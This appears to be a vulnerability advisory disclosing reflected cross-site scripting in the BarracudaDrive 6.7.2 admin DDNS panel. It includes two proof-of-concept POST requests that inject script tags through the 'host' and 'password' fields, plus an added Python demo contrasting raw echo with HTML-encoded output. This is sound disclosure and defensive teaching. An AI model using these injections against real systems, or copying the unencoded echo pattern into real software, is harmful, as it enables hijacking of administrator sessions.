BarracudaDrive 6.7.2 Cross Site Scripting

2014.06.18
Credit: NullCool
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

###############################################################################
#Exploit Title : BarracudaDrive 6.7.2 Administrator Panel Reflected Cross-Site Scripting
#Author        : Govind Singh aka NullCool
#Vendor        : http://barracudadrive.com
#Software      : BarracudaDrive 6.7.2
#Date          : 15/06/2014
#Discovered At : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to       : error1046, DeadMan India, CyberGladiator, Amit Kumar Achina
################################################################################

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Overview of vulnerability o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BarracudaDrive Multiple Reflected Cross-Site Scripting in ddns panel

Reflected Cross-Site Scripting vulnerabilities in BarracudaDrive: user input is not properly checked before submission.

1) The "host" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary script code.

2) The "password" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary script code.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Proof of Concept: o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1).

Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=81
POSTDATA=provider=DNSdynamic&host="><script>alert(123);</script>&username=%3E&password=%3E

PoC image : http://prntscr.com/3sym87

2).

Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=78
POSTDATA=provider=DNSdynamic&host=&username=%3E&password="><script>alert('Govind Singh');</script>

PoC image : http://prntscr.com/3symgz
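
Added example (not part of the original advisory and not BarracudaDrive code): the two POST bodies above are rendered into a constructed form, once with the submitted values echoed raw and once with each value HTML-attribute-encoded, and an HTML parser reports which elements the output contains. The form markup, field list and function names are assumptions made for illustration; the product's real template is not shown in the advisory.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed field list; assumed to mirror the parameters seen in the PoC bodies.
FIELDS = ("provider", "host", "username", "password")

def render_unsafe(params):
    """Echo submitted values into value="" attributes with no encoding (the flaw class)."""
    return "\n".join(
        '<input name="%s" value="%s">' % (name, params.get(name, "")) for name in FIELDS
    )

def render_safe(params):
    """Same form, with every reflected value encoded for an HTML attribute context."""
    return "\n".join(
        '<input name="%s" value="%s">' % (name, html.escape(params.get(name, ""), quote=True))
        for name in FIELDS
    )

class TagCollector(HTMLParser):
    """Records each start tag an HTML parser sees in the rendered markup."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def parse_body(body):
    """Decode an application/x-www-form-urlencoded body, first value per key."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def injected_tags(render, body):
    """Return tags present in the output that the template itself never emits."""
    collector = TagCollector()
    collector.feed(render(parse_body(body)))
    collector.close()
    return [t for t in collector.tags if t != "input"]

# POST bodies copied from the two proof-of-concept requests above.
POC_BODIES = [
    'provider=DNSdynamic&host="><script>alert(123);</script>&username=%3E&password=%3E',
    "provider=DNSdynamic&host=&username=%3E&password=\"><script>alert('Govind Singh');</script>",
]

if __name__ == "__main__":
    for body in POC_BODIES:
        print("raw echo:", injected_tags(render_unsafe, body),
              "| encoded:", injected_tags(render_safe, body))
```

With raw echo the leading `">` closes the attribute and the tag, so the parser sees a new script element; with encoding the same bytes stay inside the attribute value as data.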

